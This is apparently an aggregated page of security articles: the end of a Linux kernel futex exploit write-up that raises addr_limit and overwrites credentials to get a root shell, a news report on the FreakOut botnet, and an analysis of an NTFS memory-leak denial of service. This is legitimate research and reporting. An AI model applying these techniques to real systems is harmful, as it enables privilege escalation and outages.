This mechanism allows us to interrupt the process’ job in order to perform some other work. In our case, we’d like to shape the kernel stack in a certain way and also be able to execute a piece of code on the same thread. However, in order to arrange the stack we have to perform a blocking operation, because otherwise our arrangement would be overwritten, and while a thread is blocked it can’t exploit the stack’s state.

That’s why signals are needed and why they’re used in our scenario. They allow us to execute code within the process’ context outside its normal execution flow.

As a reminder, with pthreads all the signal handlers are shared with the parent process, because internally pthreads passes both the CLONE_THREAD and CLONE_SIGHAND flags when it creates the child with clone().

The flags mask must also include CLONE_SIGHAND if CLONE_THREAD is specified.
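The combination of a process-wide handler and a thread-directed signal can be tried in isolation. The following is a minimal sketch, not the exploit's code: all function names are hypothetical, SIGUSR1 is used instead of SIGINT so the demo does not interfere with a terminal, and the worker merely sleeps in a loop where the exploit's thread would be blocked inside the kernel.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <pthread.h>
#include <signal.h>
#include <stdatomic.h>
#include <string.h>
#include <unistd.h>

static atomic_int handler_ran;
static pthread_t handler_thread;

/* Handler is registered once per process but runs on whichever thread receives the signal. */
static void on_signal(int signo)
{
    (void)signo;
    handler_thread = pthread_self();
    atomic_store(&handler_ran, 1);
}

/* Worker idles until the handler has run in its context. */
static void *worker(void *arg)
{
    (void)arg;
    while (!atomic_load(&handler_ran))
        usleep(1000);
    return NULL;
}

/* Returns 1 if the handler executed on the thread targeted by pthread_kill(), 0 if not, -1 on error. */
int signal_runs_on_target_thread(void)
{
    pthread_t target;
    struct sigaction sa;

    memset(&sa, 0, sizeof(sa));
    sa.sa_handler = on_signal;
    sigemptyset(&sa.sa_mask);
    if (sigaction(SIGUSR1, &sa, NULL) != 0)
        return -1;
    if (pthread_create(&target, NULL, worker, NULL) != 0)
        return -1;
    if (pthread_kill(target, SIGUSR1) != 0)
        return -1;
    if (pthread_join(target, NULL) != 0)
        return -1;
    return pthread_equal(handler_thread, target) ? 1 : 0;
}
```

The point of the sketch is that pthread_kill() chooses the thread, and therefore the thread_info and addr_limit, under which the handler's code runs.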

Afterwards, we place the address that we want to write to, that is &corrupter_thread_info->addr_limit, as the fake waiter’s previous node. Once we attempt to lock the futex, the newly created waiter writes its own address to addr_limit. It’s not yet a value that we control, but it is guaranteed to be bigger than the current one because addr_limit is at the very bottom of the virtual address space.

Now we’ve arrived at a scenario where addr_limit > &addr_limit is surely true. Once this condition is met, we can simply write to addr_limit once again on our own! This is where signaling comes into play, and specifically the escalate_priv_sighandler from earlier.

Because each thread has its own thread_info, which in turn means that each thread also has its own addr_limit, we need a way to interrupt the specific thread whose addr_limit we’ve overwritten. After we’ve “increased” the address limit, only that thread is able to exploit it. This is where we signal the corrupter thread using pthread_kill(), which triggers the execution of escalate_priv_sighandler.

What this function does is read and write to different areas in kernel memory. In order to do that, I wrote a small helper function called kmemcpy(). It exploits the fact that addr_limit has been overwritten: it creates a pipe, writes to it and reads back from it. The read() and write() syscalls internally invoke copy_from_user() and copy_to_user() within the kernel, which perform their checks against addr_limit.

unsigned long
_copy_from_user(void *to, const void __user *from, unsigned long n)
{
	if (access_ok(VERIFY_READ, from, n)) // <-- addr_limit comparison
		n = __copy_from_user(to, from, n);
	else
		memset(to, 0, n);
	return n;
}

unsigned long
copy_to_user(void __user *to, const void *from, unsigned long n)
{
	if (access_ok(VERIFY_WRITE, to, n)) // <-- addr_limit comparison
		n = __copy_to_user(to, from, n);
	return n;
}

#define access_ok(type, addr, size) \
	(likely(__range_not_ok(addr, size, user_addr_max()) == 0))

#define user_addr_max() (current_thread_info()->addr_limit.seg)
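The effect of raising addr_limit can be illustrated with a simplified model of the range check. This is a sketch, not the kernel's implementation: range_ok() is a hypothetical helper, the default limit of 0xc0000000 is an assumption (the usual 3G/1G split on i386), and the kernel address used in the usage note is an illustrative value rather than one observed in the exploit.

```c
#include <assert.h>
#include <stdint.h>

#define DEFAULT_USER_LIMIT 0xc0000000u /* assumed default addr_limit on i386 */

/*
 * Simplified model of the check behind access_ok():
 * the range [addr, addr + size) must not wrap around and must end at or below limit.
 */
int range_ok(uint32_t addr, uint32_t size, uint32_t limit)
{
    uint32_t end = addr + size;

    if (end < addr) /* arithmetic wrapped past 0xffffffff */
        return 0;
    return end <= limit;
}
```

With the default limit, a 4-byte access at a kernel address such as 0xc78ca018 is rejected. Once the limit is 0xffffffff, the same access passes, which is what lets read() and write() on a pipe act as a kernel memcpy.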

The signal handler performs several operations.

  1. Cancel the address space access limitation by setting addr_limit to the highest value possible.
  2. Read the task_struct pointer of the corrupted thread.
  3. Read the parent’s task_struct pointer from the corrupted thread’s task_struct via the group_leader member which points to it.
  4. Read the cred struct pointer from the parent’s task_struct.
  5. Overwrite all the identifiers (uid, gid, suid, sgid, etc.) of the main cred struct.

Popping Shell

Now all that’s left to do is call system("/bin/sh") on the main thread to drop a shell.
Because the child process inherits the cred struct, the shell will also run with root permissions.


This has been a lot of fun, and I’ve learned so much on the way.
I got to have the interaction I desired with the kernel, working with it and understanding how it works a bit better. Needless to say, there’s an infinite amount of knowledge to be gathered, but that’s a small step onwards. At the end, the exploit seems relatively short, but the truly important part is getting there and being able to solve the puzzle.

The full repository can be found here.

If you have any questions, feel free to contact me and I’ll gladly answer.
Hope you enjoyed the read. Thanks!

Special thanks to Nspace who helped throughout the process.

FreakOut! Ongoing Botnet Attack Exploiting Recent Linux Vulnerabilities


Original text by Ravie Lakshmanan

An ongoing malware campaign has been found exploiting recently disclosed vulnerabilities in network-attached storage (NAS) devices running on Linux systems to co-opt the machines into an IRC botnet for launching distributed denial-of-service (DDoS) attacks and mining Monero cryptocurrency.

The attacks deploy a new malware variant called «FreakOut» by leveraging critical flaws fixed in Laminas Project (formerly Zend Framework) and Liferay Portal as well as an unpatched security weakness in TerraMaster, according to Check Point Research’s new analysis published today and shared with The Hacker News.

Attributing the malware to a long-time cybercrime hacker, who has gone by the aliases Fl0urite and Freak on HackForums and Pastebin since at least 2015, the researchers said the flaws (CVE-2020-28188, CVE-2021-3007, and CVE-2020-7961) were weaponized to inject and execute malicious commands in the server.

Regardless of the vulnerabilities exploited, the end goal of the attacker appears to be to download and execute a Python script named «» using Python 2, which reached end-of-life last year, implying that the threat actor is banking on the possibility that victim devices have this deprecated version installed.

«The malware, downloaded from the site hxxp://gxbrowser[.]net, is an obfuscated Python script which contains polymorphic code, with the obfuscation changing each time the script is downloaded,» the researchers said, adding the first attack attempting to download the file was observed on January 8.

And indeed, three days later, cybersecurity firm F5 Labs warned of a series of attacks targeting NAS devices from TerraMaster (CVE-2020-28188) and Liferay CMS (CVE-2020-7961) in an attempt to spread N3Cr0m0rPh IRC bot and Monero cryptocurrency miner.

An IRC Botnet is a collection of machines infected with malware that can be controlled remotely via an IRC channel to execute malicious commands.

In FreakOut’s case, the compromised devices are configured to communicate with a hardcoded command-and-control (C2) server from where they receive command messages to execute.

The malware also comes with extensive capabilities that allow it to perform various tasks, including port scanning, information gathering, creation and sending of data packets, network sniffing, and DDoS and flooding.

Furthermore, the hosts can be commandeered as a part of a botnet operation for crypto-mining, spreading laterally across the network, and launching attacks on outside targets while masquerading as the victim company.

With hundreds of devices already infected within days of launching the attack, the researchers warn, FreakOut will ratchet up to higher levels in the near future.

For its part, TerraMaster is expected to patch the vulnerability in version 4.2.07. In the meantime, it’s recommended that users upgrade to Liferay Portal 7.2 CE GA2 (7.2.1) or later and laminas-http 2.14.2 to mitigate the risk associated with the flaws.

«What we have identified is a live and ongoing cyber attack campaign targeting specific Linux users,» said Adi Ikan, head of network cybersecurity Research at Check Point. «The attacker behind this campaign is very experienced in cybercrime and highly dangerous.»

«The fact that some of the vulnerabilities exploited were just published, provides us all a good example for highlighting the significance of securing your network on an ongoing basis with the latest patches and updates.»

NTFS Remote Code Execution (CVE-2020-17096) Analysis

Original text by zecops

This is an analysis of the CVE-2020-17096 vulnerability published by Microsoft on December 12, 2020. The remote code execution vulnerability, assessed with Exploitation: “More Likely”, grabbed our attention among the last Patch Tuesday fixes.

Diffing ntfs.sys

Comparing the patched driver to the unpatched version with BinDiff, we saw that there’s only one changed function, NtfsOffloadRead.

The function is rather big, and from a careful comparison of the two driver versions, the only changed code is located at the very beginning of the function:

BinDiff - NtfsOffloadRead

Triggering the vulnerable code

From the name of the function, we deduced that it’s responsible for handling offload read requests, part of the Offloaded Data Transfers functionality introduced in Windows 8. An offload read can be requested remotely via SMB by issuing the FSCTL_OFFLOAD_READ control code.

Indeed, by issuing the FSCTL_OFFLOAD_READ control code we saw that the NtfsOffloadRead function is called, but the first if branch, where the changed code is located, is skipped. After some experimentation, we saw that one way to trigger the branch is by opening a folder, not a file, before issuing the offload read.
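To make the control code concrete, here is a minimal sketch that derives its numeric value from the standard CTL_CODE fields and packs the request buffer that accompanies it. The constants are taken from the Windows SDK headers, and the buffer layout follows our reading of the FSCTL_OFFLOAD_READ_INPUT structure in MS-FSCC. The helper names are our own, and the sketch only builds bytes; it does not send anything.

```python
import struct

# Constants as defined in the Windows SDK headers (winioctl.h).
FILE_DEVICE_FILE_SYSTEM = 0x00000009
METHOD_BUFFERED = 0
FILE_READ_ACCESS = 0x0001


def ctl_code(device_type: int, function: int, method: int, access: int) -> int:
    """Python equivalent of the CTL_CODE macro."""
    return (device_type << 16) | (access << 14) | (function << 2) | method


# FSCTL_OFFLOAD_READ is function number 153 of the file system device type.
FSCTL_OFFLOAD_READ = ctl_code(
    FILE_DEVICE_FILE_SYSTEM, 153, METHOD_BUFFERED, FILE_READ_ACCESS
)


def pack_offload_read_input(file_offset: int, copy_length: int,
                            token_ttl_ms: int = 0) -> bytes:
    """Pack Size, Flags, TokenTimeToLive, Reserved, FileOffset, CopyLength."""
    layout = "<IIIIQQ"  # little-endian, no padding: 4 x uint32 + 2 x uint64
    size = struct.calcsize(layout)
    return struct.pack(layout, size, 0, token_ttl_ms, 0, file_offset, copy_length)


print(hex(FSCTL_OFFLOAD_READ))
print(len(pack_offload_read_input(0, 4096)))
```

Over SMB, this control code and buffer would travel inside an IOCTL request issued against an already opened handle, which is why the type of object opened (file or folder) matters for reaching the branch.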

Exploring exploitation options

We looked at each of the two changes and tried to come up with the simplest way to cause some trouble to a vulnerable computer.

  • First change: The NtfsExtendedCompleteRequestInternal function wasn’t receiving the IrpContext parameter.

    Briefly looking at NtfsExtendedCompleteRequestInternal, it seems that if the first parameter is NULL, it is ignored. Otherwise, the numerous fields of the IrpContext structure are freed using functions such as ExFreePoolWithTag. The code is rather long and we didn’t analyze it thoroughly, but from a quick glance we didn’t find a way to misuse the fact that those functions aren’t called in the vulnerable version. We observed, though, that the bug causes a memory leak in the non-paged pool, which is guaranteed to reside in physical memory.

    We implemented a small tool that issues offload reads in an infinite loop. After a couple of hours, our vulnerable VM ran out of memory and froze, no longer responding to any input. Below you can see the Task Manager screenshots and the code that we used.
  • Second change: An IRP pointer field, part of IrpContext, was set to NULL.

    From our quick attempt, we didn’t find a way to misuse the fact that the IRP pointer field is set to NULL. If you have any ideas, let us know.
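The leak described under the first change can be illustrated with a toy model. This is only a sketch of the reasoning, not the driver's code: `Pool`, `complete_request`, and `offload_read_on_folder` are hypothetical stand-ins, and the only behavior modeled is "a NULL context is ignored, a non-NULL context is freed".

```python
class Pool:
    """Toy stand-in for a kernel pool that only counts live allocations."""

    def __init__(self):
        self.live = 0

    def alloc(self):
        self.live += 1
        return object()

    def free(self, _block):
        self.live -= 1


def complete_request(pool, irp_context):
    """Models the described behavior: NULL is ignored, otherwise the context is freed."""
    if irp_context is None:
        return
    pool.free(irp_context)


def offload_read_on_folder(pool, patched):
    ctx = pool.alloc()  # per-request context allocated before the early-exit branch
    # Vulnerable version: the context is not passed along, so it is never freed.
    complete_request(pool, ctx if patched else None)


def leaked_after(requests, patched):
    pool = Pool()
    for _ in range(requests):
        offload_read_on_folder(pool, patched)
    return pool.live


print(leaked_after(1000, patched=False))  # 1000 contexts still allocated
print(leaked_after(1000, patched=True))   # 0
```

Each request leaks a fixed amount in the unpatched model, so the total grows linearly with the number of requests, which matches the slow exhaustion we observed.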

What about remote code execution?

We’re curious about that as much as you are. Unfortunately, there’s a limited amount of time that we can invest in satisfying our curiosity. We went as far as finding the vulnerable code and triggering it to cause a memory leak and an eventual denial of service, but we weren’t able to exploit it for remote code execution.

It is possible that there’s no actual remote code execution here, and that it was marked as such just in case, as happened with the “Bad Neighbor” ICMPv6 Vulnerability (CVE-2020-16898). If you have any insights, we’ll be happy to hear about them.

CVE-2020-17096 POC (Denial of Service)

Before. An idle VM with a standard configuration and no running programs.

After. The same idle VM after triggering the memory leak, unresponsive.

C# code that causes the memory leak and the eventual denial of service. It was used with the Windows Protocol Test Suites.